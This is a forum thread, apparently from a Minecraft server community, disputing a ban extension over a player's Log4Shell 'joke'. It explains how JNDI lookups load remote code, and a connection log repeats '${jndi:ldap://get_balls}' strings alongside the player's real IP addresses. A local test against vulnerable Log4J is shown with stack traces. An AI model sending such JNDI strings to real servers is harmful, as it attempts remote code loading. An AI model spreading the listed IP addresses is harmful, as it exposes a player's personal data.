- Official Post
Further to previous threads.
Due to the attempt to exploit the Log4J exploit (All be it in a stupid way that could cause no damage) eva67x's existing Indef Ban is hereby extended to 6 months.
UUID - 4d708f0c-cb2a-4a1e-928f-214daccc9d18
Further to previous threads.
Due to the attempt to exploit the Log4J exploit (All be it in a stupid way that could cause no damage) eva67x's existing Indef Ban is hereby extended to 6 months.
UUID - 4d708f0c-cb2a-4a1e-928f-214daccc9d18
I would actually like to challenge this decision to extend the ban. I do not agree that this was actually an attempt to exploit Log4Shell, and I firmly believe this was intended to be a joke about a well-known exploit and not an actual attempt to cause any harm to the server whatsoever. Before I can explain my viewpoint, I'd like to clear some things up first.
Note: Many of these are things that Eva likely already knows about because she has experience coding in Java, Minecraft (along with its protocols), and computers in general.
Log4Shell abused a galaxy brain decision by the developers of Log4J where they thought it was a brilliant idea to allow people to query URLs as strings and then load whatever data that comes up as Java code. A typical payload would look something like this:
In this example, a vulnerable server would then download whatever is at http://johnson.cant-stop-dropping-sh.it/MyCockIsBiggerThanYours.class and then load it into memory as native Java code. For the payload to work, you need to specify a link that contains either a valid domain or a valid numerical IP address (with all sets of numbers being a number from 0 to 255). Keep this in mind when reading the rest of this post.
Domains essentially route human-friendly text like totalfreedom.me to IP addresses. All public domains are required to have what's called a TLD (Top Level Domain) in order to work. While private domains do not have this restriction and can be things like "cockstapler", a vulnerable server needs to firstly be configured to know what the fuck "cockstapler" is, which cannot be done from the outside world without someone breaching whatever DNS server the network relies on.
Now that we've gotten the technical explanations out of the way, let's talk about why the string Ryan cites as an attempt to exploit Log4J wouldn't work. For reference, here's the string itself:
Given the fact that the vulnerability had been patched 4 months prior to the incident and she used a string that linked to an invalid domain that was quite literally a balls joke (something she has made many many times before) and very obviously wouldn't work for the reasons above, I am inclined to believe she did not in fact attempt to exploit the vulnerability but rather was joking about the vulnerability itself. Why would she even attempt to abuse a vulnerability when she knows it would very obviously not work?
Bumping this as I have formally challenged this extension and wish to shed light on it.
The reality is they tried to push an exploit onto the server, they had no idea if it had been patched or not, and it could have caused major issues. The reality is this was one of the worse offenders of abusing this system, this is the full list of every invalid hostname they tried to join that I then had to clean up
id uuid ip vhost version time
59789 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.42.225.141 die.raccoon.pw 754 1617535581443
204363 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 hello_there_good_sir 758 1649776600382
204372 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 play.hypixel.net 758 1649776753981
204373 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 rule34.xxx 758 1649776787243
204377 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 suckonmynocomexploitblalsslslasudy76y812hui1jbadtyfguadhs 758 1649776849694
204381 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 fbi.gov 758 1649776896694
204390 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 no_comment_sirs,_thank_you_for_your_cooperation 758 1649777020370
204394 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 pornhub.com 758 1649777069070
204401 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 i_like_cum_hbu? 758 1649777137989
204412 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 youtube.com/watch?v=dqw4w9wgxcq 758 1649777294140
204417 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 www.youtube.com/watch?v=dqw4w9wgxcq 758 1649777394298
204420 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 i_love_cum_:hot_face: 758 1649777476903
204423 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 this_account_has_been_tokenlogged_by_the_amongus_impostor 758 1649777601195
204428 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 ${jndi:ldap://get_balls} 758 1649777760980
204455 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 ${jndi:ldap://get_balls} 758 1649779659430
204460 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 ${jndi:ldap://get_balls} 758 1649780072437
204467 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 ${jndi:ldap://get_balls} 758 1649781047163
204468 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 ${jndi:ldap://get_balls} 758 1649781296889
204474 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 ${jndi:ldap://get_balls} 758 1649781530368
204508 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 ${jndi:ldap://get_balls} 758 1649786597808
204511 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 video_is_a_furry 758 1649787038146
204513 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 eva_is_holy_based.nbtsrv.local 758 1649787169730
204518 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 tf.kaboom.pw 758 1649787484524
204520 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 tf.sdns.nbtsrv.local 758 1649788139926
204522 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 |||||||||||||||||||| 758 1649788769707
204600 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 |||||||||||||||||||| 758 1649806017118
204601 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 |||||||||||||||||||| 758 1649806083928
204606 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 |||||||||||||||||||| 758 1649807608513
204695 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 |||||||||||||||||||| 758 1649853073570
204696 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 |||||||||||||||||||| 758 1649853145952
204705 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 |||||||||||||||||||| 758 1649854957810
204796 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 |||||||||||||||||||| 758 1649870326916
204879 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 |||||||||||||||||||| 758 1649877825334
204891 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 |||||||||||||||||||| 758 1649878801004
204926 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 |||||||||||||||||||| 758 1649881864101
204938 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 nocom.nbtsrv.local 758 1649883880156
204956 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.65 |||||||||||||||||||| 758 1649885899681
204961 4d708f0c-cb2a-4a1e-928f-214daccc9d18 89.39.107.195 |||||||||||||||||||| 758 1649886493577
204962 4d708f0c-cb2a-4a1e-928f-214daccc9d18 89.39.107.195 nocom.nbtsrv.local 758 1649886505608
204976 4d708f0c-cb2a-4a1e-928f-214daccc9d18 89.39.107.195 |||||||||||||||||||| 758 1649887435679
204999 4d708f0c-cb2a-4a1e-928f-214daccc9d18 80.233.38.203 |||||||||||||||||||| 758 1649892665206
205006 4d708f0c-cb2a-4a1e-928f-214daccc9d18 80.233.38.203 |||||||||||||||||||| 758 1649893790462
205008 4d708f0c-cb2a-4a1e-928f-214daccc9d18 80.233.38.203 |||||||||||||||||||| 758 1649894049446
205035 4d708f0c-cb2a-4a1e-928f-214daccc9d18 80.233.38.203 |||||||||||||||||||| 758 1649897344244
205801 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 nocom.nbtsrv.local 758 1649940711410
206333 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 |||||||||||||||||||| 758 1649946965596
206334 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 |||||||||||||||||||| 758 1649947213694
206351 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 |||||||||||||||||||| 758 1649951365804
206365 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 |||||||||||||||||||| 758 1649955549544
206370 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 |||||||||||||||||||| 758 1649955762838
206373 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 |||||||||||||||||||| 758 1649956026947
206390 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 |||||||||||||||||||| 758 1649957948828
206406 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 |||||||||||||||||||| 758 1649959099907
206407 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 |||||||||||||||||||| 758 1649959166513
206415 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 |||||||||||||||||||| 758 1649959550287
206465 4d708f0c-cb2a-4a1e-928f-214daccc9d18 89.39.107.195 |||||||||||||||||||| 758 1649962457445
206466 4d708f0c-cb2a-4a1e-928f-214daccc9d18 89.39.107.195 |||||||||||||||||||| 758 1649962573747
206509 4d708f0c-cb2a-4a1e-928f-214daccc9d18 89.39.107.195 |||||||||||||||||||| 758 1649963887442
206531 4d708f0c-cb2a-4a1e-928f-214daccc9d18 37.19.199.151 |||||||||||||||||||| 758 1649967340288
206758 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 nocom.nbtsrv.local 756 1650030186347
206820 4d708f0c-cb2a-4a1e-928f-214daccc9d18 89.187.170.169 nocom.nbtsrv.local 756 1650040623382
206830 4d708f0c-cb2a-4a1e-928f-214daccc9d18 89.187.170.169 nocom.nbtsrv.local 756 1650041702896
207020 4d708f0c-cb2a-4a1e-928f-214daccc9d18 80.233.32.147 nocom.nbtsrv.local 756 1650081451127
207021 4d708f0c-cb2a-4a1e-928f-214daccc9d18 80.233.32.147 nocom.nbtsrv.local 756 1650081470702
207494 4d708f0c-cb2a-4a1e-928f-214daccc9d18 190.2.132.207 nocom.nbtsrv.local 756 1650160200961
207495 4d708f0c-cb2a-4a1e-928f-214daccc9d18 138.199.7.161 nocom.nbtsrv.local 756 1650160236497
207515 4d708f0c-cb2a-4a1e-928f-214daccc9d18 138.199.7.161 nocom.nbtsrv.local 756 1650164343947
207518 4d708f0c-cb2a-4a1e-928f-214daccc9d18 138.199.7.161 nocom.nbtsrv.local 756 1650164735239
207830 4d708f0c-cb2a-4a1e-928f-214daccc9d18 195.181.162.179 nocom.nbtsrv.local 756 1650219062759
207834 4d708f0c-cb2a-4a1e-928f-214daccc9d18 195.181.162.179 nocom.nbtsrv.local 756 1650219648433
207854 4d708f0c-cb2a-4a1e-928f-214daccc9d18 195.181.162.179 nocom.nbtsrv.local 756 1650220831681
207856 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 nocom.nbtsrv.local 756 1650220867161
207857 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 nocom.nbtsrv.local 756 1650220915231
207936 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 nocom.nbtsrv.local 756 1650227970322
208037 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 nocom.nbtsrv.local 758 1650249358800
208158 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 nocom.nbtsrv.local 758 1650295123568
208182 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 nocom.nbtsrv.local 758 1650302333546
208192 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 nocom.nbtsrv.local 758 1650304123921
208202 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.197 nocom.nbtsrv.local 758 1650305747466
208581 4d708f0c-cb2a-4a1e-928f-214daccc9d18 51.171.208.123 nocom.nbtsrv.local 758 1650389010417
208583 4d708f0c-cb2a-4a1e-928f-214daccc9d18 51.171.208.123 nocom.nbtsrv.local 758 1650389128146
208592 4d708f0c-cb2a-4a1e-928f-214daccc9d18 51.171.208.123 nocom.nbtsrv.local 758 1650391279223
208986 4d708f0c-cb2a-4a1e-928f-214daccc9d18 51.171.208.123 nocom.nbtsrv.local 758 1650496272237
209745 4d708f0c-cb2a-4a1e-928f-214daccc9d18 51.171.208.123 nocom.nbtsrv.local 758 1650728563286
214348 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.103 nocom.nbtsrv.local 758 1651868887527
214596 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.76 nocom.nbtsrv.local 758 1651930650656
214714 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.76 eva_is_holy_based.nbtsrv.local 758 1651942321580
215284 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.100.76 nocom.nbtsrv.local 758 1652040096252
216223 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.45 nocom.nbtsrv.local 758 1652300513155
216695 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.40.206.45 nocom.nbtsrv.local 758 1652465233979
252804 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1662320253428
253117 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1662409303734
253118 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1662409311537
253827 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1662810164243
253833 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1662812599346
253841 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1662813969404
266159 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1663344989484
266194 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1663360017278
266200 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1663362187140
266215 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1663368283736
266264 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1663409018927
266275 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1663418455559
266284 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1663428577021
266338 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1663460036811
266340 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1663460603566
266547 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1663625673013
267462 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1664135668988
267947 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1664636828854
267961 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1664649440032
268120 4d708f0c-cb2a-4a1e-928f-214daccc9d18 86.41.198.159 tf.nya.eva.local 759 1664732682551
Display More
they tried to push an exploit onto the server
Very arguable.
The rest still stands.
ETA: this is how we lose once active players.
they tried to push an exploit onto the server
You make it seem like she deliberately tried to exploit this vulnerability in order to compromise the server/network, even though it very clearly seems like she was joking about the exploit and genuinely didn't intend to do any harm.
they had no idea if it had been patched or not
How do you know this? Given how much time had passed since the exploit was disclosed and the true severity of the exploit, I think it would be common sense that it would have been patched by then.
it could have caused major issues
How? The URL isn't even valid, and nothing in our infrastructure uses Log4J to log that kind of information anyways. Minecraft doesn't log that kind of information when a player logs in, and BungeeCord doesn't even use Log4J as its logging library, so I highly doubt that any plugins would have been affected by it. Even if we were at all vulnerable to Log4Shell at the time, this wouldn't have done anything.
How do you know this?
What eva has said multiple times, here in details:
I connected with this address on the 12/13th of April 2022 (Same dates I was joining with made-up addresses) and the log4shell CVE was discovered and reported to Apache on the 24th of November 2021 and patched on the 9th of December 2021 (5 months before I connected with made-up addresses) which means that by this date it was patched and is no longer a CVE or exploit
You make it seem like she deliberately tried to exploit this vulnerability in order to compromise the server/network, even though it very clearly seems like she was joking about the exploit and genuinely didn't intend to do any harm.
But she did, if she didn't, she wouldn't have used a hostname that could (if the right set of circumstances were met) have caused issues to the network. If it was a "Joke" it sure as fuck wasn't a funny one.
How do you know this? Given how much time had passed since the exploit was disclosed and the true severity of the exploit, I think it would be common sense that it would have been patched by then.
Because our patch status isn't public knowledge, nor would she or most people have a full understanding of exactly what components that string could have been stored / rendered or processed through.
How? The URL isn't even valid, and nothing in our infrastructure uses Log4J to log that kind of information anyways. Minecraft doesn't log that kind of information when a player logs in, and BungeeCord doesn't even use Log4J as its logging library, so I highly doubt that any plugins would have been affected by it. Even if we were at all vulnerable to Log4Shell at the time, this wouldn't have done anything.
Most of our infrastructure did have a log4J component that could have been exploited, we had to put steps in place to ensure it couldn't be. The URL String could indeed have been valid / resolved to something again due to how Java operates and how some Java libraries will parse it for DNS resolution.
The bottom line is when people attempt to exploit anything on the network, they're banned. Again, the reality is Eva was the 2nd most significant offender based on the number of unique strings they used to connect and number of connections made, it took a substantial amount of time to clean up compared to the one or two entries most other people had. I think it's fair to punish someone more significantly when they were more significantly disruptive.
But she did, if she didn't, she wouldn't have used a hostname that could (if the right set of circumstances were met) have caused issues to the network.
But as noted below, it absolutely couldn't and Eva knows this for a fact. Also, what does "if the right set of circumstances were met" mean? That string would have only worked in that string if each of these spectacular blunders happened:
Classifying what Eva did as a deliberate attempt to harm the server requires you to prove that it would have actually worked in the default configuration for a Minecraft server, in our configuration, and in a reasonable configuration for a server like ours. In all 3 configurations, the string just simply could not work. I strongly believe she was only merely joking about the exploit itself given her knowledge on Java, its various libraries, and how they tick.
Because our patch status isn't public knowledge
Except it is public knowledge. Anyone can go to the GitHub repository for Paper (or in our case, Scissors) and compare the commit versions with what is on the server using /ver. Even then that doesn't even matter, because common sense takes place in the absence of public knowledge. Given the severity of Log4Shell where a single string could give you the keys to the mansion, it would be common sense for whoever was managing a vulnerable service to immediately patch the issue upon hearing about it. Eva, along with literally anyone else, would have assumed that we did the same thing already since it had been four months since that nuclear bomb of an exploit had dropped.
nor would she or most people have a full understanding of exactly what components that string could have been stored / rendered or processed through.
I disagree. I think she would understand it quite well. The exploit was a design flaw in the Log4J library itself and no other libraries actually had this issue. I can confidently say that nothing that gathered that kind of information would have been affected by this exploit at all.
Most of our infrastructure did have a log4J component that could have been exploited, we had to put steps in place to ensure it couldn't be.
Wait, what? Where, when, and how? I would have expected us to have discovered and patched this back in December of 2021.
The URL String could indeed have been valid / resolved to something again due to how Java operates and how some Java libraries will parse it for DNS resolution.
(Just to note, Ryan further detailed what he meant at the end with "due to how Java operates and how some Java libraries will parse it" in a set of Discord messages from October 20, 2022, which I've included below.)
FYI [...] in Java and a lot of other software if the DNS resolution fails it'll suffix .com to the hostname in the lookup. I know because I've triggered a lot of alarms on networks being monitored when we've had DNS leaks / misconfigured things.
So the reality is "${jndi:ldap://get_balls}" on the network would have resolved in a lot of cases to "${jndi:ldap://get_balls.com}"
It wouldn't - I actually tested whether the domain "get_balls" would actually resolve to anywhere valid by deploying the string from the provided evidence to a local test server running a vulnerable version of Log4J. It attempted to resolve get_balls and obviously failed. However, it did not attempt to resolve any other domain, and this is evident by the fact that it didn't throw an error about a "get_balls.com" not resolving properly despite the fact that the domain doesn't exist. You can see the results below:
me ${jndi:ldap://get_balls}
> 2022-10-27 01:14:34,203 Log4j2-TF-1-AsyncLogger[AsyncContext@70dea4e]-1 WARN Error looking up JNDI resource [ldap://get_balls]. javax.naming.CommunicationException: get_balls:389 [Root exception is java.net.UnknownHostException: get_balls]
at com.sun.jndi.ldap.Connection.<init>(Connection.java:243)
at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)
at com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2849)
at com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:347)
at com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)
at com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)
at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:202)
at com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
at javax.naming.InitialContext.lookup(InitialContext.java:417)
at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:188)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1060)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:982)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:878)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:433)
at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
at io.papermc.paper.console.HexFormattingConverter.format(HexFormattingConverter.java:83)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
at org.apache.logging.log4j.core.layout.PatternLayout$PatternSelectorSerializer.toSerializable(PatternLayout.java:456)
at org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:233)
at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:218)
at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:58)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:197)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:190)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:181)
at org.apache.logging.log4j.core.appender.RollingRandomAccessFileAppender.append(RollingRandomAccessFileAppender.java:252)
at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)
at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)
at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:464)
at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:448)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:431)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:419)
at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:79)
at org.apache.logging.log4j.core.async.AsyncLogger.actualAsyncLog(AsyncLogger.java:381)
at org.apache.logging.log4j.core.async.RingBufferLogEvent.execute(RingBufferLogEvent.java:161)
at org.apache.logging.log4j.core.async.RingBufferLogEventHandler.onEvent(RingBufferLogEventHandler.java:45)
at org.apache.logging.log4j.core.async.RingBufferLogEventHandler.onEvent(RingBufferLogEventHandler.java:29)
at com.lmax.disruptor.BatchEventProcessor.processEvents(BatchEventProcessor.java:168)
at com.lmax.disruptor.BatchEventProcessor.run(BatchEventProcessor.java:125)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.net.UnknownHostException: get_balls
at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:184)
at java.net.PlainSocketImpl.connect(PlainSocketImpl.java:172)
at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392)
at java.net.Socket.connect(Socket.java:607)
at java.net.Socket.connect(Socket.java:556)
at java.net.Socket.<init>(Socket.java:452)
at java.net.Socket.<init>(Socket.java:229)
at com.sun.jndi.ldap.Connection.createSocket(Connection.java:380)
at com.sun.jndi.ldap.Connection.<init>(Connection.java:220)
... 44 more
2022-10-27 01:14:34,209 Log4j2-TF-1-AsyncLogger[AsyncContext@70dea4e]-1 WARN Error looking up JNDI resource [ldap://get_balls]. javax.naming.CommunicationException: get_balls:389 [Root exception is java.net.UnknownHostException: get_balls]
at com.sun.jndi.ldap.Connection.<init>(Connection.java:243)
at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)
at com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2849)
at com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:347)
at com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)
at com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)
at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:202)
at com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
at javax.naming.InitialContext.lookup(InitialContext.java:417)
at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:188)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1060)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:982)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:878)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:433)
at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
at io.papermc.paper.console.HexFormattingConverter.format(HexFormattingConverter.java:83)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
at net.minecrell.terminalconsole.HighlightErrorConverter.format(HighlightErrorConverter.java:93)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
at org.apache.logging.log4j.core.layout.PatternLayout$PatternSelectorSerializer.toSerializable(PatternLayout.java:456)
at org.apache.logging.log4j.core.layout.PatternLayout$PatternSelectorSerializer.toSerializable(PatternLayout.java:445)
at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:209)
at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:58)
at net.minecrell.terminalconsole.TerminalConsoleAppender.append(TerminalConsoleAppender.java:253)
at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)
at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)
at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:464)
at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:448)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:431)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:419)
at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:79)
at org.apache.logging.log4j.core.async.AsyncLogger.actualAsyncLog(AsyncLogger.java:381)
at org.apache.logging.log4j.core.async.RingBufferLogEvent.execute(RingBufferLogEvent.java:161)
at org.apache.logging.log4j.core.async.RingBufferLogEventHandler.onEvent(RingBufferLogEventHandler.java:45)
at org.apache.logging.log4j.core.async.RingBufferLogEventHandler.onEvent(RingBufferLogEventHandler.java:29)
at com.lmax.disruptor.BatchEventProcessor.processEvents(BatchEventProcessor.java:168)
at com.lmax.disruptor.BatchEventProcessor.run(BatchEventProcessor.java:125)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.net.UnknownHostException: get_balls
at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:184)
at java.net.PlainSocketImpl.connect(PlainSocketImpl.java:172)
at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392)
at java.net.Socket.connect(Socket.java:607)
at java.net.Socket.connect(Socket.java:556)
at java.net.Socket.<init>(Socket.java:452)
at java.net.Socket.<init>(Socket.java:229)
at com.sun.jndi.ldap.Connection.createSocket(Connection.java:380)
at com.sun.jndi.ldap.Connection.<init>(Connection.java:220)
... 43 more
[01:14:31 INFO]: * Server ${jndi:ldap://get_balls}
> 2022-10-27 01:14:34,213 Log4j2-TF-1-AsyncLogger[AsyncContext@70dea4e]-1 WARN Error looking up JNDI resource [ldap://get_balls]. javax.naming.CommunicationException: get_balls:389 [Root exception is java.net.UnknownHostException: get_balls]
at com.sun.jndi.ldap.Connection.<init>(Connection.java:243)
at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)
at com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2849)
at com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:347)
at com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)
